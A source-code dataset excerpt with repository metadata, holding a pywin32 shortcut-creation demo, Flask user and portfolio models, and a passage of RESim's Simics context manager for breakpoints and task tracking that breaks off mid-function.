cmd, " with exp name ", exp_name) if not args.dry_run: subprocess.run(cmd, check=True, env=new_env) if args.run_one : break if __name__ == "__main__": args = parser.parse_args() main(args)
fcc48edcfdd4d1fc34b4b877308b372de722ad40
8eab8ab725c2132bb8d090cdb2d23a5f71945249
/virt/Lib/site-packages/win32comext/shell/demos/create_link.py
354561b7c50d6342a359a3c4e10a1c066bef399a
[ "MIT" ]
permissive
JoaoSevergnini/metalpy
6c88a413a82bc25edd9308b8490a76fae8dd76ca
c2d0098a309b6ce8c756ff840bfb53fb291747b6
refs/heads/main
2023-04-18T17:25:26.474485
2022-09-18T20:44:45
2022-09-18T20:44:45
474,773,752
3
1
MIT
2022-11-03T20:07:50
2022-03-27T22:21:01
Python
UTF-8
Python
false
false
2,329
py
# link.py # From a demo by Mark Hammond, corrupted by Mike Fletcher # (and re-corrupted by Mark Hammond :-) from win32com.shell import shell import pythoncom, os class PyShortcut: def __init__(self): self._base = pythoncom.CoCreateInstance( shell.CLSID_ShellLink, None, pythoncom.CLSCTX_INPROC_SERVER, shell.IID_IShellLink, ) def load(self, filename): # Get an IPersist interface # which allows save/restore of object to/from files self._base.QueryInterface(pythoncom.IID_IPersistFile).Load(filename) def save(self, filename): self._base.QueryInterface(pythoncom.IID_IPersistFile).Save(filename, 0) def __getattr__(self, name): if name != "_base": return getattr(self._base, name) if __name__ == "__main__": import sys if len(sys.argv) < 2: print( "Usage: %s LinkFile [path [, args[, description[, working_dir]]]]\n\nIf LinkFile does not exist, it will be created using the other args" ) sys.exit(1) file = sys.argv[1] shortcut = PyShortcut() if os.path.exists(file): # load and dump info from file... shortcut.load(file) # now print data... print( "Shortcut in file %s to file:\n\t%s\nArguments:\n\t%s\nDescription:\n\t%s\nWorking Directory:\n\t%s\nItemIDs:\n\t<skipped>" % ( file, shortcut.GetPath(shell.SLGP_SHORTPATH)[0], shortcut.GetArguments(), shortcut.GetDescription(), shortcut.GetWorkingDirectory(), # shortcut.GetIDList(), ) ) else: if len(sys.argv) < 3: print( "Link file does not exist\nYou must supply the path, args, description and working_dir as args" ) sys.exit(1) # create the shortcut using rest of args... data = map( None, sys.argv[2:], ("SetPath", "SetArguments", "SetDescription", "SetWorkingDirectory"), ) for value, function in data: if value and function: # call function on each non-null value getattr(shortcut, function)(value) shortcut.save(file)
097ffe889ecca6ba681f647340800b9ee5807fde
4f0d9dbbf1a870b661870ebb1f4ac2306e6e3802
/apps/main/models.py
ccc30a23e7cb0441f0aa491fb824e23c663e04a4
[]
no_license
ItEngine/ItEngine
a5d13af8ae6fc4ebcb4633d0e12e8e7e90a10c63
2932f31f33140b3e066d8108235398276500092e
refs/heads/master
2020-12-03T02:30:36.385719
2016-07-23T00:58:04
2016-07-23T00:58:04
45,215,270
1
0
null
null
null
null
UTF-8
Python
false
false
2,385
py
import datetime from flask import Blueprint from sqlalchemy import event from sqlalchemy.event import listens_for from werkzeug.security import generate_password_hash from app import db, login_manager class User(db.Model): """ Model User """ __tablename__ = 'Users' id = db.Column(db.Integer, primary_key=True) username = db.Column(db.String(30), unique=True, nullable=False) email = db.Column(db.String(120), unique=True, nullable=False) password = db.Column(db.String(120), nullable=False) first_name = db.Column(db.String(120), nullable=False) last_name = db.Column(db.String(120), nullable=False) date_join = db.Column( db.DateTime, nullable=False, default=datetime.datetime.utcnow ) is_active = db.Column( db.Boolean, default=True ) is_admin = db.Column( db.Boolean, default=False ) @property def is_authenticated(self): return True def get_id(self): try: return self.id except AttributeError: raise NotImplementedError('No `id` attribute - override `get_id`') def __repr__(self): return '<User %r>' % (self.username) def hash_password(target, value, oldvalue, initiator): if value is not None: return generate_password_hash(value) # Setup listener on User attribute password event.listen(User.password, 'set', hash_password, retval=True) @login_manager.user_loader def load_user(id): """ For flask-login get user id """ return User.query.get(int(id)) class Site(db.Model): """ Model Site """ __tablename__ = 'Sites' id = db.Column(db.Integer, primary_key=True) company = db.Column(db.String(120), nullable=False) descrip = db.Column(db.String(500), nullable=False) type_company = db.Column(db.String(50), nullable=False) site_company = db.Column(db.String(120), nullable=False) photo = db.Column(db.Unicode(128)) class Portfolio(db.Model): """ Model Portfolio """ __tablename__ = 'Portfolios' id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(120), nullable=False) descrip = db.Column(db.String(500), nullable=False) tecnologies = db.Column(db.String(50), nullable=False) site_url = db.Column(db.String(120), nullable=False) photo = db.Column(db.Unicode(128))
a6388fd226aa360a3e348f2f9468dcad02a7a36f
f4e57645e92b594dcf611336b774f9febcd09923
/simics/monitorCore/genContextMgr.py
7d63179158f92977c44f66d185ba05a758005c85
[]
no_license
kingking888/RESim
24dc63f23df59c66a4aa455cef25a71ecbf2958a
cb3ea4536df5f93719894db83fbfbe42eb25309a
refs/heads/master
2023-03-21T00:11:12.327617
2021-03-19T22:37:32
2021-03-19T22:37:32
null
0
0
null
null
null
null
UTF-8
Python
false
false
45,525
py
from simics import * ''' Track task context and set/remove beakpoints & haps accordingly. Currently recognises two contexts: default & RESim. Also has a carve-out for "maze_exit" breakpoints/haps, managed as an attribute of the hap. Designed to watch a single thread group. There is one instance of this module per cell. ''' class GenBreakpoint(): def __init__(self, cell, addr_type, mode, addr, length, flags, handle, lgr, prefix=None): self.cell = cell self.addr_type = addr_type self.mode = mode self.addr = addr self.length = length self.flags = flags self.break_num = None self.lgr = lgr self.handle = handle self.prefix = prefix self.set() def show(self): print('\tbreak_handle: %s num: %s add:0x%x' % (str(self.handle), str(self.break_num), self.addr)) def set(self): #self.break_num = SIM_breakpoint(self.cell, self.addr_type, self.mode, self.addr, self.length, self.flags) ''' do set in hap? ''' pass #self.lgr.debug('GenBreakpoint set done in hap, the break handle is %d' % self.handle) def clear(self): if self.break_num is not None: #self.lgr.debug('GenBreakpoint clear breakpoint %d break handle is %d' % (self.break_num, self.handle)) SIM_delete_breakpoint(self.break_num) self.break_num = None class GenHap(): def __init__(self, hap_type, callback, parameter, handle, lgr, breakpoint_list, name, immediate=True): ''' breakpoint_start and breakpont_end are GenBreakpoint types ''' self.hap_type = hap_type self.callback = callback ''' used with afl ''' self.parameter = parameter self.breakpoint_list = breakpoint_list self.lgr = lgr self.hap_num = None self.handle = handle self.name = name self.set(immediate) def show(self): if self.handle is not None and self.hap_num is not None: print('hap_handle: %d num: %d name: %s' % (self.handle, self.hap_num, self.name)) for bp in self.breakpoint_list: bp.show() def hapAlone(self, (bs, be)): #self.lgr.debug('GenHap alone set hap_handle %s name: %s on range %s %s (0x%x 0x%x) break handles %s %s' % (str(self.handle), # self.name, str(bs.break_num), str(be.break_num), # bs.addr, be.addr, str(bs.handle), str(be.handle))) self.hap_num = SIM_hap_add_callback_range(self.hap_type, self.callback, self.parameter, bs.break_num, be.break_num) #self.lgr.debug('GenHap alone set hap_handle %s assigned hap %s name: %s on range %s %s (0x%x 0x%x) break handles %s %s' % (str(self.handle), # str(self.hap_num), self.name, str(bs.break_num), str(be.break_num), # bs.addr, be.addr, str(bs.handle), str(be.handle))) def set(self, immediate=True): ''' NOTE: different calls to SIM_brekapoint below ''' if len(self.breakpoint_list) > 1: for bp in self.breakpoint_list: bp.break_num = SIM_breakpoint(bp.cell, bp.addr_type, bp.mode, bp.addr, bp.length, bp.flags) if bp.prefix is not None: command = 'set-prefix %d "%s"' % (bp.break_num, bp.prefix) SIM_run_alone(SIM_run_command, command) #self.lgr.debug('contextManager prefix cmd: %s' % command) self.lgr.debug('GenHap breakpoint created for hap_handle %d assigned breakpoint num %d' % (self.handle, bp.break_num)) bs = self.breakpoint_list[0] be = self.breakpoint_list[-1] #self.lgr.debug('GenHap callback range') if immediate: #self.lgr.debug('GenHap set hap_handle %s assigned name: %s on range %s %s (0x%x 0x%x) break handles %s %s' % (str(self.handle), # self.name, str(bs.break_num), str(be.break_num), # bs.addr, be.addr, str(bs.handle), str(be.handle))) self.hap_num = SIM_hap_add_callback_range(self.hap_type, self.callback, self.parameter, bs.break_num, be.break_num) #self.lgr.debug('GenHap set hap_handle %s assigned hap %s name: %s on range %s %s (0x%x 0x%x) break handles %s %s' % (str(self.handle), # str(self.hap_num), self.name, str(bs.break_num), str(be.break_num), # bs.addr, be.addr, str(bs.handle), str(be.handle))) else: SIM_run_alone(self.hapAlone, (bs, be)) elif len(self.breakpoint_list) == 1: bp = self.breakpoint_list[0] #self.lgr.debug('bp.cell is %s addr %s' % (str(bp.cell), str(bp.addr))) if bp.addr is None: self.lgr.error('contextManager, set bp.addr is none') return bp.break_num = SIM_breakpoint(bp.cell, bp.addr_type, bp.mode, bp.addr, bp.length, bp.flags) if bp.prefix is not None: command = 'set-prefix %d "%s"' % (bp.break_num, bp.prefix) SIM_run_alone(SIM_run_command, command) #self.lgr.debug('contextManager prefix cmd: %s' % command) #self.lgr.debug('GenHap set hap_handle %s name: %s on break %s (0x%x) break_handle %s' % (str(self.handle), # self.name, str(bp.break_num), bp.addr, str(bp.handle))) self.hap_num = SIM_hap_add_callback_index(self.hap_type, self.callback, self.parameter, bp.break_num) #self.lgr.debug('GenHap set hap_handle %s assigned hap %s name: %s on break %s (0x%x) break_handle %s' % (str(self.handle), str(self.hap_num), # self.name, str(bp.break_num), bp.addr, str(bp.handle))) else: self.lgr.error('GenHap, no breakpoints') def clear(self, dumb=None): if self.hap_num is not None: for bp in self.breakpoint_list: bp.clear() SIM_hap_delete_callback_id(self.hap_type, self.hap_num) #self.lgr.debug('GenHap clear hap %d handle %d' % (self.hap_num, self.handle)) self.hap_num = None class GenContextMgr(): def __init__(self, top, cell_name, task_utils, param, cpu, lgr): self.top = top self.cell_name = cell_name self.task_utils = task_utils self.param = param self.task_utils = task_utils self.mem_utils = task_utils.getMemUtils() self.debugging_pid = None self.debugging_pid_saved = None self.debugging_comm = None self.debugging_cell = None self.cpu = cpu self.pageFaultGen = None ''' watch multiple tasks, e.g., threads ''' self.watch_rec_list = {} self.watch_rec_list_saved = {} self.pending_watch_pids = [] self.nowatch_list = [] self.watching_tasks = False self.single_thread = False self.lgr = lgr self.ida_message = None self.exit_break_num = None self.exit_cb_num = None self.phys_current_task = task_utils.getPhysCurrentTask() self.task_break = None self.task_hap = None self.breakpoints = [] self.haps = [] self.break_handle = 0 self.hap_handle = 0 self.text_start = None self.text_end = None self.catch_pid = None self.catch_callback = None self.watch_only_this = False ''' used with afl ''' self.callback = None self.exit_callback = None ''' experiment with tracking task switches among watched pids ''' self.task_switch = {} obj = SIM_get_object(cell_name) self.default_context = obj.cell_context context = 'RESim_%s' % cell_name cmd = 'new-context %s' % context SIM_run_command(cmd) obj = SIM_get_object(context) self.resim_context = obj self.lgr.debug('context_manager cell %s resim_context defined as obj %s' % (self.cell_name, str(obj))) ''' avoid searching all task recs to know if pid being watched ''' self.pid_cache = [] self.group_leader = None ''' watch pointers to task recs to catch kills ''' self.task_rec_hap = {} self.task_rec_bp = {} self.task_rec_watch = {} ''' avoid multiple calls to taskRecHap ''' self.demise_cache = [] ''' used by pageFaultGen to supress breaking on apparent kills ''' self.watching_page_faults = False def getRealBreak(self, break_handle): for hap in self.haps: for bp in hap.breakpoint_list: if bp.handle == break_handle: return bp.break_num return None def getBreakHandle(self, real_bp): for hap in self.haps: #self.lgr.debug('getBreakHandle hap %s' % (hap.name)) for bp in hap.breakpoint_list: #self.lgr.debug('getBreakHandle look for %d got %d' % (real_bp, bp.break_num)) if bp.break_num == real_bp: return bp.handle return None def showHaps(self): self.lgr.debug('contextManager showHaps') for hap in self.haps: hap.show() #def getRESimContext(self): # return self.debugging_cell def recordText(self, start, end): self.lgr.debug('contextMgr recordText 0x%x 0x%x' % (start, end)) self.text_start = start self.text_end = end def getText(self): return self.text_start, self.text_end def nextHapHandle(self): self.hap_handle = self.hap_handle+1 return self.hap_handle def nextBreakHandle(self): self.break_handle = self.break_handle+1 return self.break_handle def genBreakpoint(self, cell, addr_type, mode, addr, length, flags, prefix=None): ''' create a GenContextManager breakpoint. This is not yet set. Determine if the context should be resim, e.g., only when one of our debugging processes is schedule. ''' handle = self.nextBreakHandle() if self.debugging_pid is not None and addr_type == Sim_Break_Linear: cell = self.resim_context #self.lgr.debug('gen break with resim context %s' % str(self.resim_context)) bp = GenBreakpoint(cell, addr_type, mode, addr, length, flags, handle, self.lgr, prefix=prefix) self.breakpoints.append(bp) #self.lgr.debug('genBreakpoint handle %d number of breakpoints is now %d prefix %s' % (handle, len(self.breakpoints), prefix)) return handle def genDeleteBreakpoint(self, handle): #self.lgr.debug('genDeleteBreakpoint handle %d -- do not delete, will be done in GenHap' % handle) #for bp in self.breakpoints: # if bp.handle == handle: # bp.clear() # self.breakpoints.remove(bp) # return #self.lgr.debug('genDeleteBreakpoint could not find break handle %d' % handle) pass def genDeleteHap(self, hap_handle, immediate=False): if hap_handle is None: self.lgr.warning('genDelteHap called with handle of none') return #self.lgr.debug('genDeleteHap hap_handle %d' % hap_handle) hap_copy = list(self.haps) for hap in hap_copy: if hap.handle == hap_handle: if immediate: hap.clear(None) else: SIM_run_alone(hap.clear, None) #self.lgr.debug('num breaks in hap %d is %d' % (hap_handle, len(hap.breakpoint_list))) for bp in hap.breakpoint_list: if bp in self.breakpoints: #self.lgr.debug('removing bp %d from hap_handle %d break_num %s' % (bp.handle, hap_handle, str(bp.break_num))) self.breakpoints.remove(bp) else: self.lgr.warning('genDeleteHap bp not in list, handle %d ' % (bp.handle)) #self.lgr.debug('genDeleteHap removing hap %d from list' % hap.handle) self.haps.remove(hap) return #self.lgr.debug('genDeleteHap could not find hap_num %d' % hap_handle) def genHapIndex(self, hap_type, callback, parameter, handle, name=None): #self.lgr.debug('genHapIndex break_handle %d' % handle) for bp in self.breakpoints: if bp.handle == handle: hap_handle = self.nextHapHandle() hap = GenHap(hap_type, callback, parameter, hap_handle, self.lgr, [bp], name) self.haps.append(hap) return hap.handle #self.lgr.error('genHapIndex failed to find break %d' % breakpoint) def genHapRange(self, hap_type, callback, parameter, handle_start, handle_end, name=None): #self.lgr.debug('genHapRange break_handle %d %d' % (handle_start, handle_end)) bp_start = None bp_list = [] for bp in self.breakpoints: if bp.handle >= handle_start: bp_list.append(bp) if bp.handle == handle_end: hap_handle = self.nextHapHandle() hap = GenHap(hap_type, callback, parameter, hap_handle, self.lgr, bp_list, name, immediate=False) #self.lgr.debug('contextManager genHapRange set hap %s on %d breaks' % (name, len(bp_list))) self.haps.append(hap) return hap.handle #self.lgr.error('genHapRange failed to find break for handles %d or %d' % (breakpoint_start, breakpoint_end)) def setAllBreak(self): for bp in self.breakpoints: bp.set() if self.pageFaultGen is not None: self.pageFaultGen.recordPageFaults() def setAllHap(self, only_maze_breaks=False): for hap in self.haps: if (not only_maze_breaks and hap.name != 'exitMaze') or (only_maze_breaks and hap.name == 'exitMaze'): hap.set() def clearAllBreak(self): ''' Called to clear breaks within the resim context ''' for bp in self.breakpoints: #if bp.cell == self.resim_context: bp.clear() if self.pageFaultGen is not None: self.pageFaultGen.stopPageFaults() def clearAllHap(self, keep_maze_breaks=False): #self.lgr.debug('clearAllHap start') for hap in self.haps: if not keep_maze_breaks or hap.name != 'exitMaze': hap.clear() #self.lgr.debug('clearAllHap finish') def getThreadRecs(self): return self.watch_rec_list.keys() def getThreadPids(self): retval = [] for rec in self.watch_rec_list: pid = self.watch_rec_list[rec] #self.lgr.debug('genContextManager getThreadPids append %d to returned thread pid list' % (pid)) retval.append(pid) return retval def addNoWatch(self): ''' only watch maze exits for the current task. NOTE: assumes those are set after call to this function''' self.lgr.debug('contextManager cell %s addNoWatch' % self.cell_name) if len(self.nowatch_list) == 0 and len(self.watch_rec_list) == 0: ''' had not been watching and tasks. start so we can not watch this one ''' self.setTaskHap() self.watching_tasks=True self.lgr.debug('contextManager addNoWatch began watching tasks') rec = self.task_utils.getCurTaskRec() self.nowatch_list.append(rec) self.lgr.debug('contextManager addNoWatch for rec 0x%x' % rec) SIM_run_alone(self.clearAllHap, True) def rmNoWatch(self): ''' restart watching the current task, assumes it was added via addNoWatch ''' rec = self.task_utils.getCurTaskRec() if rec in self.nowatch_list: self.nowatch_list.remove(rec) self.lgr.debug('contextManager rmNoWatch, rec 0x%x removed from nowatch list' % rec) if len(self.nowatch_list) == 0 and len(self.watch_rec_list) == 0: ''' stop all task watching ''' self.stopWatchTasks() SIM_run_alone(self.setAllHap, False) self.lgr.debug('contextManager addNoWatch stopped watching tasks, enabled all HAPs') else: ''' restart watching ''' SIM_run_alone(self.setAllHap, False) else: self.lgr.error('contextManager rmNoWatch, rec 0x%x not in nowatch list' % rec) def changedThread(self, cpu, third, forth, memory): ''' guts of context managment. set or remove breakpoints/haps depending on whether we are tracking the newly scheduled process ''' if self.task_hap is None: return # get the value that will be written into the current thread address new_addr = SIM_get_mem_op_value_le(memory) prev_task = self.task_utils.getCurTaskRec() #DEBUG BLOCK pid = self.mem_utils.readWord32(cpu, new_addr + self.param.ts_pid) comm = self.mem_utils.readString(cpu, new_addr + self.param.ts_comm, 16) prev_pid = self.mem_utils.readWord32(cpu, prev_task + self.param.ts_pid) prev_comm = self.mem_utils.readString(cpu, prev_task + self.param.ts_comm, 16) self.lgr.debug('changeThread from %d (%s) to %d (%s) new_addr 0x%x watchlist len is %d debugging_comm is %s context %s' % (prev_pid, prev_comm, pid, comm, new_addr, len(self.watch_rec_list), self.debugging_comm, cpu.current_context)) if len(self.pending_watch_pids) > 0: ''' Are we waiting to watch pids that have not yet been scheduled? We don't have the process rec until it is ready to schedule. ''' if pid in self.pending_watch_pids: self.lgr.debug('changedThread, pending add pid %d to watched processes' % pid) self.watch_rec_list[new_addr] = pid self.pending_watch_pids.remove(pid) self.watchExit(rec=new_addr, pid=pid) if pid not in self.pid_cache and comm == self.debugging_comm: group_leader = self.mem_utils.readPtr(cpu, new_addr + self.param.ts_group_leader) leader_pid = self.mem_utils.readWord32(cpu, group_leader + self.param.ts_pid) add_it = False if leader_pid in self.pid_cache: add_it = True elif pid == leader_pid: parent = self.mem_utils.readPtr(cpu, new_addr + self.param.ts_real_parent) if parent in self.watch_rec_list: parent_pid = self.mem_utils.readWord32(cpu, parent + self.param.ts_pid) self.lgr.debug('contextManager new clone %d is its own leader, but parent %d is in cache. Call the parent the leader.' % (pid, parent_pid)) add_it = True leader_pid = parent_pid else: self.lgr.debug('contextManager pid:%d (%s) not in cache, nor is parent in watch_rec_list 0x%x' % (pid, comm, parent)) if add_it: ''' TBD, we have no reason to believe this clone is created by the group leader? Using parent or real_parent is no help''' self.lgr.debug('contextManager adding clone %d (%s) leader is %d' % (pid, comm, leader_pid)) self.addTask(pid, new_addr) self.top.addProc(pid, leader_pid, comm, clone=True) self.watchExit(new_addr, pid) self.top.recordStackClone(pid, leader_pid) else: self.lgr.debug('contextManager pid:%d (%s) not in cache, group leader 0x%x leader pid %d' % (pid, comm, group_leader, leader_pid)) elif pid in self.pid_cache and new_addr not in self.watch_rec_list: self.lgr.debug('*********** pid in cache, but new_addr not in watch list? eh?') if not self.watching_tasks and \ (new_addr in self.watch_rec_list or (len(self.watch_rec_list) == 0 and len(self.nowatch_list) > 0)) \ and not (self.single_thread and pid != self.debugging_pid): ''' Not currently watching processes, but new process should be watched ''' if self.debugging_pid is not None: cpu.current_context = self.resim_context #self.lgr.debug('resim_context') #self.lgr.debug('Now scheduled %d new_addr 0x%x' % (pid, new_addr)) self.watching_tasks = True self.setAllBreak() only_maze_breaks = False if new_addr in self.nowatch_list: only_maze_breaks = True #self.lgr.debug('contextManager changedThread, only do maze breaks') SIM_run_alone(self.setAllHap, only_maze_breaks) elif self.watching_tasks: if prev_task in self.nowatch_list: if new_addr not in self.nowatch_list: ''' was watching only maze exits, watch everything but maze''' #self.lgr.debug('was watching only maze, now watch all ') SIM_run_alone(self.clearAllHap, False) SIM_run_alone(self.setAllHap, False) elif new_addr in self.nowatch_list: ''' was watching everything, watch only maze ''' #self.lgr.debug('Now only watch maze') SIM_run_alone(self.clearAllHap, False) SIM_run_alone(self.setAllHap, True) elif len(self.watch_rec_list) > 0 and new_addr not in self.watch_rec_list: ''' Watching processes, but new process should not be watched ''' if self.debugging_pid is not None: cpu.current_context = self.default_context #self.lgr.debug('default_context') #self.lgr.debug('No longer scheduled') self.watching_tasks = False #self.auditExitBreaks() self.clearAllBreak() #if pid not in self.task_switch: # self.task_switch[pid] = [] #self.task_switch[pid].append(self.cpu.cycles) SIM_run_alone(self.clearAllHap, False) elif len(self.watch_rec_list) > 0: ''' switching between watched pids ''' #if pid not in self.task_switch: # self.task_switch[pid] = [] #self.task_switch[pid].append(self.cpu.cycles) pass if self.catch_pid == pid: self.lgr.debug('contextManager changedThread do catch_callback for pid %d' % pid) SIM_break_simulation('in pid %d' % pid) #SIM_run_alone(self.catch_callback, None) self.catch_pid = None def catchPid(self, pid, callback): self.catch_pid = pid self.catch_callback = callback def watchAll(self): self.watch_only_this = False def watchOnlyThis(self): ctask = self.task_utils.getCurTaskRec() cur_pid = self.mem_utils.readWord32(self.cpu, ctask + self.param.ts_pid) pcopy = list(self.pid_cache) for pid in pcopy: if pid != cur_pid: self.rmTask(pid) self.watch_only_this = True def rmTask(self, pid, killed=False): ''' remove a pid from the list of task records being watched. return True if this is the last thread. ''' retval = False rec = self.task_utils.getRecAddrForPid(pid) if rec is None and killed: ''' assume record already gone ''' for r in self.watch_rec_list: if self.watch_rec_list[r] == pid: rec = r self.lgr.debug('contextManager rmTask %d rec already gone, remove its entries' % pid) break if rec in self.watch_rec_list: del self.watch_rec_list[rec] self.lgr.debug('rmTask removing rec 0x%x for pid %d, len now %d' % (rec, pid, len(self.watch_rec_list))) if pid in self.pid_cache: self.pid_cache.remove(pid) self.lgr.debug('rmTask remove %d from cache, cache now %s' % (pid, str(self.pid_cache))) if pid in self.task_rec_bp and self.task_rec_bp[pid] is not None: SIM_delete_breakpoint(self.task_rec_bp[pid]) self.lgr.debug('contextManger rmTask pid %d' % pid) SIM_hap_delete_callback_id('Core_Breakpoint_Memop', self.task_rec_hap[pid]) del self.task_rec_bp[pid] del self.task_rec_hap[pid] del self.task_rec_watch[pid] if len(self.watch_rec_list) == 0: if self.debugging_comm is None: self.lgr.warning('contextManager rmTask debugging_comm is None') else: self.lgr.debug('contextManager rmTask watch_rec_list empty, clear debugging_pid') #self.debugging_comm = None #self.debugging_cell = None pids = self.task_utils.getPidsForComm(self.debugging_comm) if len(pids) == 0: self.cpu.current_context = self.default_context self.stopWatchTasks() retval = True else: if self.top.swapSOPid(pid, pids[0]): self.lgr.debug('contextManager rmTask, still pids for comm %s, was fork? set dbg pid to %d' % (self.debugging_comm, pids[0])) ''' replace SOMap pid with new one from fork ''' self.debugging_pid = pids[0] else: ''' TBD poor hueristic for deciding it was not a fork ''' self.cpu.current_context = self.default_context self.stopWatchTasks() retval = True elif pid == self.debugging_pid: self.debugging_pid = self.pid_cache[0] self.lgr.debug('rmTask debugging_pid now %d' % self.debugging_pid) else: self.lgr.debug('rmTask remaining debug recs %s' % str(self.watch_rec_list)) return retval def addTask(self, pid, rec=None): if rec is None: rec = self.task_utils.getRecAddrForPid(pid) if rec not in self.watch_rec_list: if rec is None: #self.lgr.debug('genContextManager, addTask got rec of None for pid %d, pending' % pid) self.pending_watch_pids.append(pid) else: #self.lgr.debug('genContextManager, addTask pid %d add rec 0x%x' % (pid, rec)) self.watch_rec_list[rec] = pid self.watchExit(rec=rec, pid=pid) if pid not in self.pid_cache: self.pid_cache.append(pid) else: #self.lgr.debug('addTask, already has rec 0x%x for PID %d' % (rec, pid)) pass def watchingThis(self): ctask = self.task_utils.getCurTaskRec() dumb, comm, cur_pid = self.task_utils.curProc() if cur_pid in self.pid_cache or ctask in self.watch_rec_list: #self.lgr.debug('am watching pid:%d' % cur_pid) return True else: #self.lgr.debug('not watching %d' % cur_pid) return False def amWatching(self, pid): ctask = self.task_utils.getCurTaskRec() dumb, comm, cur_pid = self.task_utils.curProc() if pid == cur_pid and (ctask in self.watch_rec_list or len(self.watch_rec_list)==0): return True elif pid in self.pid_cache: return True else: return False def restoreDefaultContext(self): self.cpu.current_context = self.default_context self.lgr.debug('contextManager restoreDefaultContext') def restoreDebugContext(self): self.cpu.current_context = self.resim_context self.lgr.debug('contextManager restoreDebugContext') def restoreDebug(self): self.debugging_pid = self.debugging_pid_saved self.watch_rec_list = self.watch_rec_list_saved.copy() for ctask in self.watch_rec_list: self.pid_cache.append(self.watch_rec_list[ctask]) self.cpu.current_context = self.resim_context self.lgr.debug('contextManager restoreDebug set cpu context to resim, debugging_pid to %s' % str(self.debugging_pid)) def stopWatchTasks(self): if self.task_break is None: self.lgr.debug('stopWatchTasks already stopped') return SIM_delete_breakpoint(self.task_break) SIM_hap_delete_callback_id("Core_Breakpoint_Memop", self.task_hap) self.task_hap = None self.task_break = None self.watching_tasks = False self.watch_rec_list_saved = self.watch_rec_list.copy() if self.debugging_pid is not None: self.debugging_pid_saved = self.debugging_pid self.watch_rec_list = {} for pid in self.task_rec_bp: if self.task_rec_bp[pid] is not None: self.lgr.debug('stopWatchTasks delete bp %d' % self.task_rec_bp[pid]) SIM_delete_breakpoint(self.task_rec_bp[pid]) SIM_hap_delete_callback_id('Core_Breakpoint_Memop', self.task_rec_hap[pid]) self.task_rec_bp = {} self.task_rec_hap = {} self.task_rec_watch = {} self.pid_cache = [] self.debugging_pid = None cpu, dumb, dumb2 = self.task_utils.curProc() cpu.current_context = self.default_context self.lgr.debug('stopWatchTasks reverted %s to default context %s' % (cpu.name, str(self.default_context))) def resetWatchTasks(self): ''' Intended for use when going back in time ''' self.lgr.debug('resetWatchTasks') self.stopWatchTasks() self.watchTasks(set_debug_pid = True) if not self.watch_only_this: ctask = self.task_utils.getCurTaskRec() pid = self.mem_utils.readWord32(self.cpu, ctask + self.param.ts_pid) if pid == 1: self.lgr.debug('resetWatchTasks got leader pid of 1, skip') return leader_pid = self.task_utils.getGroupLeaderPid(pid) pid_list = self.task_utils.getGroupPids(leader_pid) for pid in pid_list: if pid == 1: self.lgr.debug('resetWatchTasks got pid of 1, skip') else: self.addTask(pid) def setTaskHap(self): #print('genContextManager setTaskHap debugging_cell is %s' % self.debugging_cell) self.task_break = SIM_breakpoint(self.cpu.physical_memory, Sim_Break_Physical, Sim_Access_Write, self.phys_current_task, self.mem_utils.WORD_SIZE, 0) #self.lgr.debug('genContextManager setTaskHap bp %d' % self.task_break) self.task_hap = SIM_hap_add_callback_index("Core_Breakpoint_Memop", self.changedThread, self.cpu, self.task_break) #self.lgr.debug('setTaskHap cell %s break %d set on physical 0x%x' % (self.cell_name, self.task_break, self.phys_current_task)) def restoreWatchTasks(self): self.watching_tasks = True if self.debugging_pid is not None: self.lgr.debug('contextManager restoreWatchTasks cpu context to resim') self.cpu.current_context = self.resim_context def watchTasks(self, set_debug_pid = False): if self.task_break is not None: #self.lgr.debug('watchTasks called, but already watching') return ctask = self.task_utils.getCurTaskRec() pid = self.mem_utils.readWord32(self.cpu, ctask + self.param.ts_pid) if pid == 1: #self.lgr.debug('contextManager watchTasks, pid is 1, ignore') return if self.task_break is None: self.setTaskHap() self.watching_tasks = True self.watchExit() self.pageFaultGen.recordPageFaults() if ctask in self.watch_rec_list: self.lgr.debug('watchTasks, current task already being watched') return self.lgr.debug('watchTasks cell %s watch record 0x%x pid: %d set_debug_pid: %r' % (self.cell_name, ctask, pid, set_debug_pid)) self.watch_rec_list[ctask] = pid if pid not in self.pid_cache: self.pid_cache.append(pid) group_leader = self.task_utils.getGroupLeaderPid(pid) if group_leader != self.group_leader: #self.lgr.debug('contextManager watchTasks x set group leader to %d' % group_leader) self.group_leader = group_leader if set_debug_pid: self.setDebugPid() def changeDebugPid(self, pid): if pid not in self.pid_cache: self.lgr.error('contextManager changeDebugPid not in pid cache %d' % pid) return self.lgr.debug('changeDebugPid to %d' % pid) self.debugging_pid = pid def singleThread(self, single): self.single_thread = single def setDebugPid(self): if self.debugging_pid is not None: self.lgr.debug('contextManager setDebugPid already set to %d' % self.debugging_pid) return cell, comm, cur_pid = self.task_utils.curProc() #self.default_context = self.cpu.current_context self.cpu.current_context = self.resim_context self.lgr.debug('setDebugPid %d, (%s) resim_context' % (cur_pid, comm)) self.debugging_pid = cur_pid self.debugging_comm = comm self.debugging_cell = self.top.getCell() if cur_pid not in self.pid_cache: self.pid_cache.append(cur_pid) def killGroup(self, lead_pid, exit_syscall): self.top.rmDebugExitHap() if lead_pid == self.group_leader: pids = self.task_utils.getPidsForComm(self.debugging_comm) add_task = None for p in pids: if p not in self.pid_cache: self.lgr.debug('killGroup found pid %d not in cache, was it a fork?' % p) add_task =p break self.lgr.debug('contextManager killGroup %d is leader, pid_cache is %s' % (lead_pid, str(self.pid_cache))) cache_copy = list(self.pid_cache) for pid in cache_copy: ida_msg = 'killed %d member of group led by %d' % (pid, lead_pid) exit_syscall.handleExit(pid, ida_msg, killed=True, retain_so=True) #self.rmTask(pid, killed=True) #if pid in self.demise_cache: # self.demise_cache.remove(pid) if self.pageFaultGen is not None: if self.pageFaultGen.handleExit(pid): print('SEGV on pid %d?' % pid) self.lgr.debug('genContextManager SEGV on pid %d?' % pid) self.clearExitBreaks() if add_task is not None: self.addTask(add_task) elif self.group_leader != None: self.lgr.debug('contextManager killGroup NOT leader. got %d, leader was %d' % (lead_pid, self.group_leader)) if self.pageFaultGen is not None: self.pageFaultGen.handleExit(lead_pid) else: self.lgr.debug('contextManager killGroup NO leader. got %d' % (lead_pid)) if self.pageFaultGen is not None: self.pageFaultGen.handleExit(lead_pid) def deadParrot(self, pid): ''' who knew? death comes betweeen the breakpoint and the "run alone" scheduling ''' exit_syscall = self.top.getSyscall(self.cell_name, 'exit_group') if exit_syscall is not None and not self.watching_page_faults: ida_msg = 'pid:%d exit via kill?' % pid self.lgr.debug('contextManager deadParrot pid:%d rec no longer found call killGroup' % (pid)) 